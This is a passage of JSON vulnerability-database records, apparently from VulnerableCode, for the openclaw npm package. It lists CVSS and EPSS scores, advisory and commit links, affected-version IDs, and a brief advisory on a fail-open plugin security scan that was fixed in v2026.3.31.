secrets.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34505","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05818","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07765","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07777","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34505"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f96ba87f033a14183fa0ede912df3a592eef55ff","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f96ba87f033a14183fa0ede912df3a592eef55ff"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44173","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44173"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:53:27Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:53:27Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation"},{"reference_url":"https://github.com/advisories/GHSA-5m9r-p9g7-679c","reference_id":"GHSA-5m9r-p9g7-679c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5m9r-p9g7-679c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-34505","GHSA-5m9r-p9g7-679c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kthe-sgfb-kkb2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89149?format=json","vulnerability_id":"VCID-kzgh-7f6h-kfd1","summary":"OpenClaw: Security Scan Failure Does Not Block Plugin Installation (Fail-Open)\n## Summary\nSecurity Scan Failure Does Not Block Plugin Installation (Fail-Open)\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Real in shipped v2026.3.28 plugin install flow, but low severity fits because it still requires an operator to choose installation of an untrusted package and the scan failure was visible rather than silent.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7a953a52271b9188a5fa830739a4366614ff9916` — 2026-03-30T15:36:08+01:00\n- `44b993613601280d46a5b88190e46669fc13d669` — 2026-03-31T23:16:11+09:00\n- `0d7f1e2c84eca65df7dee890d9c30e2a841c030a` — 2026-03-31T23:27:20+09:00\n- `bf96c67fd1954740aeabfadc7cfe3098bcfc6b68` — 2026-03-31T15:53:29+01:00\n\nOpenClaw thanks @davidluzsilva for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41377","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11725","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11684","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11719","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41377"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a"},{"reference_url":"https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669"},{"reference_url":"https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916"},{"reference_url":"https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwq8-6f96-g3q4","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/